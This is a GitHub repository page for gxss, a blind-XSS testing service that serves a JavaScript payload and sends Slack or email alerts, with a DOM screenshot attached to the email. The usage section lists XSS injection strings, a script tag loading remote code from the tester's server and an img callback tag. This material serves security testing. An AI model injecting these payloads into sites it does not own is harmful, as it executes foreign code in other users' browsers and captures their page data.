Skip to content

rverton/gxss

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Blind XSS as a service

gxss is a simple tool which serves a javascript payload and allows to identify blind XSS vulnerabilities. This is similar to xsshunter, but a bit simpler to configure and run. Alerts can be sent via Slack or email. Emails will also have a screenshot of the DOM attached (which is not possible over the Slack webhook API).

gxss

Note: The javascript payload was taken (and slightly modified) from xsshunter

Installation

go get -u github.com/rverton/gxss

Configuration

Create a file called .env or set up your environment to export the following data:

PORT=8080
MAIL_SERVER=mail.example.com:25
MAIL_USER=user
MAIL_PASS=pass
MAIL_TO=hello@robinverton.de
MAIL_FROM=gxss@robinverton.de
SLACK_WEBHOOK=https://hooks.slack.com/XYZ
SERVE_URL=localhost:8080

The SERVE_URL is the public accessible URL of your server.

You can leave the MAIL_* or the SLACK_WEBHOOK setting blank if you do not want to use it. Find more about how to setup Slack webhooks here.

Usage

$ gxss

You can now use a payload like the following which will load and execute the javascript payload:

<script src=//yourserver.com></script>

gxss can also be used as a request bin. Every request matching //yourserver.com/k{key} will be alerted to you. Example:

<img src=//yourserver.com/kTARGET1>

Alternatives

  • xsshunter, python, most features, alerts require Mailgun account and wildcard certificate
  • xless, node.js, serverless on zeit.co, alerts over Slack

About

Blind XSS service alerting over slack or email

Topics

Resources

License

Stars

Watchers

Forks

Packages

No packages published